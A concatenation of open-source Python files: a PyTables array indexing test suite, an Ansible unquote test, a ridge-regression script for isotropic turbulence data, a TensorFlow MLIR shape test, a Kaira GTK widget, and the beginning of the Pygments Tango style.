(0, -4), (0, 0), (0, 0)], ] class PointSelection4(PointSelectionTestCase): shape = (1, 3, 2, 5, 6) working_keyset = [ [(0, 0), (0, 1), (0, 0), (0, 0), (0, 0)], [(0, 0), (0, -1), (0, 0), (0, 0), (0, 0)], ] not_working_keyset = [ [(0, 0), (0, 3), (0, 0), (0, 0), (0, 0)], [(0, 0), (0, 4), (0, 0), (0, 0), (0, 0)], [(0, 0), (0, -4), (0, 0), (0, 0), (0, 0)], ] class FancySelectionTestCase(common.TempFileMixin, TestCase): def setUp(self): super(FancySelectionTestCase, self).setUp() M, N, O = self.shape # The next are valid selections for both NumPy and PyTables self.working_keyset = [ ([1, 3], slice(1, N-1), 2), ([M-1, 1, 3, 2], slice(None), 2), # unordered lists supported (slice(M), [N-1, 1, 0], slice(None)), (slice(1, M, 3), slice(1, N), [O-1, 1, 0]), (M-1, [2, 1], 1), (1, 2, 1), # regular selection ([1, 2], -2, -1), # negative indices ([1, -2], 2, -1), # more negative indices ([1, -2], 2, Ellipsis), # one ellipsis (Ellipsis, [1, 2]), # one ellipsis (numpy.array( [1, -2], 'i4'), 2, -1), # array 32-bit instead of list (numpy.array( [-1, 2], 'i8'), 2, -1), # array 64-bit instead of list ] # Using booleans instead of ints is deprecated since numpy 1.8 # Tests for keys that have to support the __index__ attribute #if (sys.version_info[0] >= 2 and sys.version_info[1] >= 5): # self.working_keyset.append( # (False, True), # equivalent to (0,1) ;-) # ) # Valid selections for NumPy, but not for PyTables (yet) # The next should raise an IndexError self.not_working_keyset = [ numpy.array([False, True], dtype="b1"), # boolean arrays ([1, 2, 1], 2, 1), # repeated values ([1, 2], 2, [1, 2]), # several lists ([], 2, 1), # empty selections (Ellipsis, [1, 2], Ellipsis), # several ellipsis # Using booleans instead of ints is deprecated since numpy 1.8 ([False, True]), # boolean values with incompatible shape ] # The next should raise an IndexError in both NumPy and PyTables self.not_working_oob = [ ([1, 2], 2, 1000), # out-of-bounds selections ([1, 2], 2000, 1), # out-of-bounds selections ] # The next should raise a IndexError in both NumPy and PyTables self.not_working_too_many = [ ([1, 2], 2, 1, 1), ] # Create a sample array nparr = numpy.empty(self.shape, dtype=numpy.int32) data = numpy.arange(N * O, dtype=numpy.int32).reshape(N, O) for i in xrange(M): nparr[i] = data * i self.nparr = nparr self.tbarr = self.h5file.create_array(self.h5file.root, 'array', nparr) def test01a_read(self): """Test for fancy-selections (working selections, read).""" nparr = self.nparr tbarr = self.tbarr for key in self.working_keyset: if common.verbose: print("Selection to test:", key) a = nparr[key] b = tbarr[key] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables selections does not match.") def test01b_read(self): """Test for fancy-selections (not working selections, read).""" # nparr = self.nparr tbarr = self.tbarr for key in self.not_working_keyset: if common.verbose: print("Selection to test:", key) # a = nparr[key] self.assertRaises(IndexError, tbarr.__getitem__, key) def test01c_read(self): """Test for fancy-selections (out-of-bound indexes, read).""" nparr = self.nparr tbarr = self.tbarr for key in self.not_working_oob: if common.verbose: print("Selection to test:", key) self.assertRaises(IndexError, nparr.__getitem__, key) self.assertRaises(IndexError, tbarr.__getitem__, key) def test01d_read(self): """Test for fancy-selections (too many indexes, read).""" nparr = self.nparr tbarr = self.tbarr for key in self.not_working_too_many: if common.verbose: print("Selection to test:", key) # ValueError for numpy 1.6.x and earlier # IndexError in numpy > 1.8.0 self.assertRaises((ValueError, IndexError), nparr.__getitem__, key) self.assertRaises(IndexError, tbarr.__getitem__, key) def test02a_write(self): """Test for fancy-selections (working selections, write).""" nparr = self.nparr tbarr = self.tbarr for key in self.working_keyset: if common.verbose: print("Selection to test:", key) s = nparr[key] nparr[key] = s * 2 tbarr[key] = s * 2 a = nparr[:] b = tbarr[:] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables modifications does not match.") def test02b_write(self): """Test for fancy-selections (working selections, write, broadcast).""" nparr = self.nparr tbarr = self.tbarr for key in self.working_keyset: if common.verbose: print("Selection to test:", key) # s = nparr[key] nparr[key] = 2 # broadcast value tbarr[key] = 2 # broadcast value a = nparr[:] b = tbarr[:] # if common.verbose: # print("NumPy modified array:", a) # print("PyTables modifyied array:", b) self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables modifications does not match.") class FancySelection1(FancySelectionTestCase): shape = (5, 3, 3) # Minimum values class FancySelection2(FancySelectionTestCase): # shape = (5, 3, 3) # Minimum values shape = (7, 3, 3) class FancySelection3(FancySelectionTestCase): # shape = (5, 3, 3) # Minimum values shape = (7, 4, 5) class FancySelection4(FancySelectionTestCase): # shape = (5, 3, 3) # Minimum values shape = (5, 3, 10) class CopyNativeHDF5MDAtom(TestCase): def setUp(self): super(CopyNativeHDF5MDAtom, self).setUp() filename = self._testFilename("array_mdatom.h5") self.h5file = tables.open_file(filename, "r") self.arr = self.h5file.root.arr self.copy = tempfile.mktemp(".h5") self.copyh = tables.open_file(self.copy, mode="w") self.arr2 = self.arr.copy(self.copyh.root, newname="arr2") def tearDown(self): self.h5file.close() self.copyh.close() os.remove(self.copy) super(CopyNativeHDF5MDAtom, self).tearDown() def test01_copy(self): """Checking that native MD atoms are copied as-is""" self.assertEqual(self.arr.atom, self.arr2.atom) self.assertEqual(self.arr.shape, self.arr2.shape) def test02_reopen(self): """Checking that native MD atoms are copied as-is (re-open)""" self.copyh.close() self.copyh = tables.open_file(self.copy, mode="r") self.arr2 = self.copyh.root.arr2 self.assertEqual(self.arr.atom, self.arr2.atom) self.assertEqual(self.arr.shape, self.arr2.shape) class AccessClosedTestCase(common.TempFileMixin, TestCase): def setUp(self): super(AccessClosedTestCase, self).setUp() a = numpy.zeros((10, 10)) self.array = self.h5file.create_array(self.h5file.root, 'array', a) def test_read(self): self.h5file.close() self.assertRaises(ClosedNodeError, self.array.read) def test_getitem(self): self.h5file.close() self.assertRaises(ClosedNodeError, self.array.__getitem__, 0) def test_setitem(self): self.h5file.close() self.assertRaises(ClosedNodeError, self.array.__setitem__, 0, 0) class BroadcastTest(common.TempFileMixin, TestCase): def test(self): """Test correct broadcasting when the array atom is not scalar.""" array_shape = (2, 3) element_shape = (3,) dtype = numpy.dtype((numpy.int, element_shape)) atom = Atom.from_dtype(dtype) h5arr = self.h5file.create_carray(self.h5file.root, 'array', atom, array_shape) size = numpy.prod(element_shape) nparr = numpy.arange(size).reshape(element_shape) h5arr[0] = nparr self.assertTrue(numpy.all(h5arr[0] == nparr)) class TestCreateArrayArgs(common.TempFileMixin, TestCase): where = '/' name = 'array' obj = numpy.array([[1, 2], [3, 4]]) title = 'title' byteorder = None createparents = False atom = Atom.from_dtype(obj.dtype) shape = obj.shape def test_positional_args(self): self.h5file.create_array(self.where, self.name, self.obj, self.title) self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(self.obj, nparr)) def test_positional_args_atom_shape(self): self.h5file.create_array(self.where, self.name, None, self.title, self.byteorder, self.createparents, self.atom, self.shape) self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(numpy.zeros_like(self.obj), nparr)) def test_kwargs_obj(self): self.h5file.create_array(self.where, self.name, title=self.title, obj=self.obj) self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(self.obj, nparr)) def test_kwargs_atom_shape_01(self): ptarr = self.h5file.create_array(self.where, self.name, title=self.title, atom=self.atom, shape=self.shape) ptarr[...] = self.obj self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(self.obj, nparr)) def test_kwargs_atom_shape_02(self): ptarr = self.h5file.create_array(self.where, self.name, title=self.title, atom=self.atom, shape=self.shape) #ptarr[...] = self.obj self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(numpy.zeros_like(self.obj), nparr)) def test_kwargs_obj_atom(self): ptarr = self.h5file.create_array(self.where, self.name, title=self.title, obj=self.obj, atom=self.atom) self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(self.obj, nparr)) def test_kwargs_obj_shape(self): ptarr = self.h5file.create_array(self.where, self.name, title=self.title, obj=self.obj, shape=self.shape) self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(self.obj, nparr)) def test_kwargs_obj_atom_shape(self): ptarr = self.h5file.create_array(self.where, self.name, title=self.title, obj=self.obj, atom=self.atom, shape=self.shape) self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(self.obj, nparr)) def test_kwargs_obj_atom_error(self): atom = Atom.from_dtype(numpy.dtype('complex')) #shape = self.shape + self.shape self.assertRaises(TypeError, self.h5file.create_array, self.where, self.name, title=self.title, obj=self.obj, atom=atom) def test_kwargs_obj_shape_error(self): #atom = Atom.from_dtype(numpy.dtype('complex')) shape = self.shape + self.shape self.assertRaises(TypeError, self.h5file.create_array, self.where, self.name, title=self.title, obj=self.obj, shape=shape) def test_kwargs_obj_atom_shape_error_01(self): atom = Atom.from_dtype(numpy.dtype('complex')) #shape = self.shape + self.shape self.assertRaises(TypeError, self.h5file.create_array, self.where, self.name, title=self.title, obj=self.obj, atom=atom, shape=self.shape) def test_kwargs_obj_atom_shape_error_02(self): #atom = Atom.from_dtype(numpy.dtype('complex')) shape = self.shape + self.shape self.assertRaises(TypeError, self.h5file.create_array, self.where, self.name, title=self.title, obj=self.obj, atom=self.atom, shape=shape) def test_kwargs_obj_atom_shape_error_03(self): atom = Atom.from_dtype(numpy.dtype('complex')) shape = self.shape + self.shape self.assertRaises(TypeError, self.h5file.create_array, self.where, self.name, title=self.title, obj=self.obj, atom=atom, shape=shape) def suite(): theSuite = unittest.TestSuite() niter = 1 for i in range(niter): # The scalar case test should be refined in order to work theSuite.addTest(unittest.makeSuite(Basic0DOneTestCase)) theSuite.addTest(unittest.makeSuite(Basic0DTwoTestCase)) # theSuite.addTest(unittest.makeSuite(Basic1DZeroTestCase)) theSuite.addTest(unittest.makeSuite(Basic1DOneTestCase)) theSuite.addTest(unittest.makeSuite(Basic1DTwoTestCase)) theSuite.addTest(unittest.makeSuite(Basic1DThreeTestCase)) theSuite.addTest(unittest.makeSuite(Basic2DOneTestCase)) theSuite.addTest(unittest.makeSuite(Basic2DTwoTestCase)) theSuite.addTest(unittest.makeSuite(Basic10DTestCase)) # The 32 dimensions case is tested on GroupsArray # theSuite.addTest(unittest.makeSuite(Basic32DTestCase)) theSuite.addTest(unittest.makeSuite(ReadOutArgumentTests)) theSuite.addTest(unittest.makeSuite( SizeOnDiskInMemoryPropertyTestCase)) theSuite.addTest(unittest.makeSuite(GroupsArrayTestCase)) theSuite.addTest(unittest.makeSuite(ComplexNotReopenNotEndianTestCase)) theSuite.addTest(unittest.makeSuite(ComplexReopenNotEndianTestCase)) theSuite.addTest(unittest.makeSuite(ComplexNotReopenEndianTestCase)) theSuite.addTest(unittest.makeSuite(ComplexReopenEndianTestCase)) theSuite.addTest(unittest.makeSuite(CloseCopyTestCase)) theSuite.addTest(unittest.makeSuite(OpenCopyTestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex1TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex2TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex3TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex4TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex5TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex6TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex7TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex8TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex9TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex10TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex11TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex12TestCase)) theSuite.addTest(unittest.makeSuite(GI1NAOpenTestCase)) theSuite.addTest(unittest.makeSuite(GI1NACloseTestCase)) theSuite.addTest(unittest.makeSuite(GI2NAOpenTestCase)) theSuite.addTest(unittest.makeSuite(GI2NACloseTestCase)) theSuite.addTest(unittest.makeSuite(SI1NAOpenTestCase)) theSuite.addTest(unittest.makeSuite(SI1NACloseTestCase)) theSuite.addTest(unittest.makeSuite(SI2NAOpenTestCase)) theSuite.addTest(unittest.makeSuite(SI2NACloseTestCase)) theSuite.addTest(unittest.makeSuite(GE1NAOpenTestCase)) theSuite.addTest(unittest.makeSuite(GE1NACloseTestCase)) theSuite.addTest(unittest.makeSuite(GE2NAOpenTestCase)) theSuite.addTest(unittest.makeSuite(GE2NACloseTestCase)) theSuite.addTest(unittest.makeSuite(NonHomogeneousTestCase)) theSuite.addTest(unittest.makeSuite(TruncateTestCase)) theSuite.addTest(unittest.makeSuite(FancySelection1)) theSuite.addTest(unittest.makeSuite(FancySelection2)) theSuite.addTest(unittest.makeSuite(FancySelection3)) theSuite.addTest(unittest.makeSuite(FancySelection4)) theSuite.addTest(unittest.makeSuite(PointSelection0)) theSuite.addTest(unittest.makeSuite(PointSelection1)) theSuite.addTest(unittest.makeSuite(PointSelection2)) theSuite.addTest(unittest.makeSuite(PointSelection3)) theSuite.addTest(unittest.makeSuite(PointSelection4)) theSuite.addTest(unittest.makeSuite(CopyNativeHDF5MDAtom)) theSuite.addTest(unittest.makeSuite(AccessClosedTestCase)) theSuite.addTest(unittest.makeSuite(TestCreateArrayArgs)) theSuite.addTest(unittest.makeSuite(BroadcastTest)) return theSuite if __name__ == '__main__': common.parse_argv(sys.argv) common.print_versions() unittest.main(defaultTest='suite')
bsd-3-clause
amousset/ansible
test/units/parsing/test_unquote.py
152
2073
# coding: utf-8 # (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type from nose import tools from ansible.compat.tests import unittest from ansible.parsing.splitter import unquote # Tests using nose's test generators cannot use unittest base class. # http://nose.readthedocs.org/en/latest/writing_tests.html#test-generators class TestUnquote: UNQUOTE_DATA = ( (u'1', u'1'), (u'\'1\'', u'1'), (u'"1"', u'1'), (u'"1 \'2\'"', u'1 \'2\''), (u'\'1 "2"\'', u'1 "2"'), (u'\'1 \'2\'\'', u'1 \'2\''), (u'"1\\"', u'"1\\"'), (u'\'1\\\'', u'\'1\\\''), (u'"1 \\"2\\" 3"', u'1 \\"2\\" 3'), (u'\'1 \\\'2\\\' 3\'', u'1 \\\'2\\\' 3'), (u'"', u'"'), (u'\'', u'\''), # Not entirely sure these are good but they match the current # behaviour (u'"1""2"', u'1""2'), (u'\'1\'\'2\'', u'1\'\'2'), (u'"1" 2 "3"', u'1" 2 "3'), (u'"1"\'2\'"3"', u'1"\'2\'"3'), ) def check_unquote(self, quoted, expected): tools.eq_(unquote(quoted), expected) def test_unquote(self): for datapoint in self.UNQUOTE_DATA: yield self.check_unquote, datapoint[0], datapoint[1]
gpl-3.0
linhvannguyen/PhDworks
codes/isotropic/regression/regressionUtils.py
2
10304
""" Created on Aug 02 2016 @author: Linh Van Nguyen (linh.van.nguyen@hotmail.com) """ import numpy as np from netCDF4 import Dataset def data_preprocess(sspacing, tspacing): """ Load coupled input-output of LR and HR from file and normalize to zero-mean and one- standard deviation Parameters ---------- sspacing : 2D subsampling ratio in space (in one direction) tspacing : 1D subsampling ratio in time """ # Constants Nh = 96 Nt = 37 # Position of measurements in space-time HTLS_sknots = np.arange(0,Nh,sspacing) LTHS_tknots = np.arange(0,Nh,tspacing) Nl = len(HTLS_sknots) Ns = len(LTHS_tknots) # Dimension of HTLS and LTHS P = Nh*Nh Q = Nl*Nl M = Nt*Ns #Load all training data Xh_tr = np.zeros((M, P)) Xl_tr = np.zeros((M, Q)) ncfile1 = Dataset('/data/ISOTROPIC/data/data_downsampled4.nc','r') for t in range(Nt): count = 0 for i in LTHS_tknots: xh = np.array(ncfile1.variables['velocity_x'][t,0:Nh,0:Nh,i]) xl = xh[0:-1:sspacing,0:-1:sspacing] # xh[np.meshgrid(HTLS_sknots,HTLS_sknots)] Xh_tr[t*Ns + count,:] = np.reshape(xh,(1, P)) Xl_tr[t*Ns + count,:] = np.reshape(xl,(1, Q)) count = count + 1 ncfile1.close() # normalized: centered, variance 1 mea_l = np.zeros(Q) sig_l = np.zeros(Q) for k in range(Q): mea_l[k] = np.mean(Xl_tr[:,k]) sig_l[k] = np.std(Xl_tr[:,k]) Xl_tr[:,k] = (Xl_tr[:,k]-mea_l[k])/sig_l[k] mea_h = np.zeros(P) sig_h = np.zeros(P) for k in range(P): mea_h[k] = np.mean(Xh_tr[:,k]) sig_h[k] = np.std(Xh_tr[:,k]) Xh_tr[:,k] = (Xh_tr[:,k]-mea_h[k])/sig_h[k] return (Xl_tr, mea_l, sig_l, Xh_tr,mea_h,sig_h) ####################### RIDGE REGRESSION ###################################### def RR_cv_estimate_alpha(sspacing, tspacing, alphas): """ Estimate the optimal regularization parameter using grid search from a list and via k-fold cross validation Parameters ---------- sspacing : 2D subsampling ratio in space (in one direction) tspacing : 1D subsampling ratio in time alphas : list of regularization parameters to do grid search """ #Load all training data (Xl_tr, mea_l, sig_l, Xh_tr,mea_h,sig_h) = data_preprocess(sspacing, tspacing) # RidgeCV from sklearn.linear_model import RidgeCV ridge = RidgeCV(alphas = alphas, cv = 10, fit_intercept=False, normalize=False) ridge.fit(Xl_tr, Xh_tr) RR_alpha_opt = ridge.alpha_ print('\n Optimal lambda:', RR_alpha_opt) # save to .mat file import scipy.io as io filename = "".join(['/data/PhDworks/isotropic/regerssion/RR_cv_alpha_sspacing', str(sspacing),'_tspacing',str(tspacing),'.mat']) io.savemat(filename, dict(alphas=alphas, RR_alpha_opt=RR_alpha_opt)) # return return RR_alpha_opt def RR_allfields(sspacing, tspacing, RR_alpha_opt): """ Reconstruct all fields using RR and save to netcdf file Parameters ---------- sspacing : 2D subsampling ratio in space (in one direction) tspacing : 1D subsampling ratio in time RR_alpha_opt : optimal regularization parameter given from RR_cv_estimate_alpha(sspacing, tspacing, alphas) """ # Constants Nh = 96 Nt = 37 #Load all training data (Xl_tr, mea_l, sig_l, Xh_tr,mea_h,sig_h) = data_preprocess(sspacing, tspacing) # Ridge Regression from sklearn.linear_model import Ridge ridge = Ridge(alpha=RR_alpha_opt, fit_intercept=False, normalize=False) ridge.fit(Xl_tr, Xh_tr) print np.shape(ridge.coef_) # Prediction and save to file filename = "".join(['/data/PhDworks/isotropic/regerssion/RR_sspacing', str(sspacing),'_tspacing',str(tspacing),'.nc']) import os try: os.remove(filename) except OSError: pass ncfile2 = Dataset(filename, 'w') ncfile1 = Dataset('/data/PhDworks/isotropic/refdata_downsampled4.nc','r') # create the dimensions ncfile2.createDimension('Nt',Nt) ncfile2.createDimension('Nz',Nh) ncfile2.createDimension('Ny',Nh) ncfile2.createDimension('Nx',Nh) # create the var and its attribute var = ncfile2.createVariable('Urec', 'd',('Nt','Nz','Ny','Nx')) for t in range(Nt): print('3D snapshot:',t) for i in range(Nh): xl = np.array(ncfile1.variables['velocity_x'][t,0:Nh:sspacing,0:Nh:sspacing,i]) # load only LR xl = np.divide(np.reshape(xl,(1, xl.size)) - mea_l, sig_l) #pre-normalize xrec = np.multiply(ridge.predict(xl), sig_h) + mea_h # re-normalize the prediction var[t,:,:,i] = np.reshape(xrec, (Nh,Nh)) # put to netcdf file # Close file ncfile1.close() ncfile2.close() def RR_validationcurve(sspacing, tspacing, RR_lambda_opt, lambdas_range): """ Reconstruct all fields using RR and save to netcdf file Parameters ---------- sspacing : 2D subsampling ratio in space (in one direction) tspacing : 1D subsampling ratio in time RR_alpha_opt : optimal regularization parameter given from RR_cv_estimate_alpha(sspacing, tspacing, alphas) """ # lambdas_range= np.logspace(-2, 4, 28) #Load all training data (Xl_tr, mea_l, sig_l, Xh_tr,mea_h,sig_h) = data_preprocess(sspacing, tspacing) # validation curve from sklearn.linear_model import Ridge from sklearn.learning_curve import validation_curve train_MSE, test_MSE = validation_curve(Ridge(),Xl_tr, Xh_tr, param_name="alpha", param_range=lambdas_range, scoring = "mean_squared_error", cv=10) # API always tries to maximize a loss function, so MSE is actually in the flipped sign train_MSE = -train_MSE test_MSE = -test_MSE # save to .mat file import scipy.io as sio sio.savemat('/data/PhDworks/isotropic/regerssion/RR_crossvalidation.mat', dict(lambdas_range=lambdas_range, train_MSE = train_MSE, test_MSE = test_MSE)) return (train_MSE, test_MSE) def RR_learningcurve(sspacing, tspacing, RR_lambda_opt, train_sizes): # train_sizes=np.linspace(.1, 1.0, 20) #Load all training data (Xl_tr, mea_l, sig_l, Xh_tr,mea_h,sig_h) = data_preprocess(sspacing, tspacing) # Learning curve from sklearn.linear_model import Ridge from sklearn.learning_curve import learning_curve from sklearn import cross_validation estimator = Ridge(alpha=RR_lambda_opt, fit_intercept=False, normalize=False) cv = cross_validation.ShuffleSplit(np.shape(Xl_tr)[0], n_iter=50, test_size=0.1, random_state=0) train_sizes, train_MSE, test_MSE = learning_curve(estimator, Xl_tr, Xh_tr, cv=cv, n_jobs=4, train_sizes = train_sizes, scoring = "mean_squared_error") # save to .mat file import scipy.io as sio sio.savemat('/data/PhDworks/isotropic/regerssion/RR_learningcurve.mat', dict(train_sizes=train_sizes, train_MSE = -train_MSE, test_MSE = -test_MSE)) ####################### OTHER FUNCTIONS ####################################### def plot_learning_curve(estimator, plt, X, y, ylim=None, cv=None, n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)): """ Generate a simple plot of the test and traning learning curve. Parameters ---------- estimator : object type that implements the "fit" and "predict" methods An object of that type which is cloned for each validation. plt : current matplotlib plot X : array-like, shape (n_samples, n_features) Training vector, where n_samples is the number of samples and n_features is the number of features. y : array-like, shape (n_samples) or (n_samples, n_features), optional Target relative to X for classification or regression; None for unsupervised learning. ylim : tuple, shape (ymin, ymax), optional Defines minimum and maximum yvalues plotted. cv : integer, cross-validation generator, optional If an integer is passed, it is the number of folds (defaults to 3). Specific cross-validation objects can be passed, see sklearn.cross_validation module for the list of possible objects n_jobs : integer, optional Number of jobs to run in parallel (default 1). """ if ylim is not None: plt.ylim(*ylim) plt.xlabel("Number of training examples") plt.ylabel("Score") from sklearn.learning_curve import learning_curve train_sizes, train_scores, test_scores = learning_curve(estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes) train_scores_mean = np.mean(train_scores, axis=1) train_scores_std = np.std(train_scores, axis=1) test_scores_mean = np.mean(test_scores, axis=1) test_scores_std = np.std(test_scores, axis=1) plt.fill_between(train_sizes, train_scores_mean - train_scores_std, train_scores_mean + train_scores_std, alpha=0.1, color="r") plt.fill_between(train_sizes, test_scores_mean - test_scores_std, test_scores_mean + test_scores_std, alpha=0.1, color="g") plt.plot(train_sizes, train_scores_mean, 'o-', color="r", label="Training score") plt.plot(train_sizes, test_scores_mean, 'o-', color="g", label="Cross-validation score") plt.grid() plt.legend(loc="best") return plt def interp2 (x, y, z, xnew, ynew, kind='cubic'): from scipy import interpolate f = interpolate.interp2d(x, y, z, kind=kind) return f(xnew, ynew) def NRMSE (xref, xrec): err = np.sqrt(np.sum(np.square(xref.ravel()-xrec.ravel())))/np.sqrt(np.sum(np.square(xref.ravel()))) return err
mit
tensorflow/tensorflow
tensorflow/compiler/mlir/tensorflow/tests/tf_saved_model/shapes_for_arguments.py
21
1840
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # RUN: %p/shapes_for_arguments | FileCheck %s # pylint: disable=missing-docstring,line-too-long from __future__ import absolute_import from __future__ import division from __future__ import print_function import tensorflow.compat.v2 as tf from tensorflow.compiler.mlir.tensorflow.tests.tf_saved_model import common class TestModule(tf.Module): # Check that we get shapes annotated on function arguments. # # Besides checking the shape on the function input argument, this test also # checks that the shape on the input argument is propagated to the return # value. # We eventually want to move the shape inference to a pass separate from # the initial import, in which case that aspect of this test doesn't make much # sense and will be superceded by MLIR->MLIR shape inference tests. # # CHECK: func {{@[a-zA-Z_0-9]+}}(%arg0: tensor<f32> {{.*}}) -> (tensor<f32> {{.*}}) # CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["some_function"] @tf.function(input_signature=[tf.TensorSpec([], tf.float32)]) def some_function(self, x): return x if __name__ == '__main__': common.do_test(TestModule)
apache-2.0
Palasekm/Kaira
gui/packages.py
1
1929
# # Copyright (C) 2012 Stanislav Bohm # # This file is part of Kaira. # # Kaira is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 3 of the License, or # (at your option) any later version. # # Kaira is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Kaira. If not, see <http://www.gnu.org/licenses/>. # import gtkutils import gtk import os import paths class PackagesWidget(gtk.Table): def __init__(self, project): gtk.Table.__init__(self, 2, 2) self.project = project self.packages_list = gtkutils.SimpleList([("Available packages", str)]) self.selected_list = gtkutils.SimpleList([("Selected packages", str)]) self.attach(self.packages_list, 0, 1, 1, 2) self.attach(self.selected_list, 1, 2, 1, 2) self.read_available_packages() self.packages_list.connect_view("row-activated", lambda w, i, p: self.add_package()) self.selected_list.connect_view("row-activated", lambda w, i, p: self.remove_package()) def read_available_packages(self): packages = [ filename[:-5] for filename in os.listdir(paths.PACKAGES_DIR) if filename.endswith(".proj")] self.packages_list.fill([(package,) for package in packages]) def add_package(self): name = self.packages_list.get_and_remove_selection(0) self.selected_list.append((name,)) def remove_package(self): name = self.selected_list.get_and_remove_selection(0) self.packages_list.append((name,))
gpl-3.0
dhenrygithub/QGIS
python/ext-libs/pygments/styles/tango.py
363
7096
# -*- coding: utf-8 -*- """ pygments.styles.tango ~~~~~~~~~~~~~~~~~~~~~ The Crunchy default Style inspired from the color palette from the Tango Icon Theme Guidelines. http://tango.freedesktop.org/Tango_Icon_Theme_Guidelines Butter: #fce94f #edd400 #c4a000 Orange: #fcaf3e #f57900 #ce5c00 Chocolate: #e9b96e #c17d11 #8f5902 Chameleon: #8ae234 #73d216 #4e9a06 Sky Blue: #729fcf #3465a4 #204a87 Plum: #ad7fa8 #75507b #5c35cc Scarlet Red:#ef2929 #cc0000 #a40000 Aluminium: #eeeeec #d3d7cf #babdb6 #888a85 #555753 #2e3436 Not all of the above colors are used; other colors added: very light grey: #f8f8f8 (for background) This style can be used as a template as it includes all the known Token types, unlike most (if not all) of the styles included in the Pygments distribution. However, since Crunchy is intended to be used by beginners, we have strived to create a style that gloss over subtle distinctions between different categories. Taking Python for example, comments (Comment.*) and docstrings (String.Doc) have been chosen to have the same style. Similarly, keywords (Keyword.*), and Operator.Word (and, or, in) have been assigned the same style. :copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS. :license: BSD, see LICENSE for details. """ from pygments.style import Style from pygments.token import Keyword, Name, Comment, String, Error, \ Number, Operator, Generic, Whitespace, Punctuation, Other, Literal class TangoStyle(Style): """ The Crunchy default Style inspired from the color palette from the Tango Icon Theme Guidelines. """ # work in progress... background_color = "#f8f8f8" default_style = "" styles = { # No 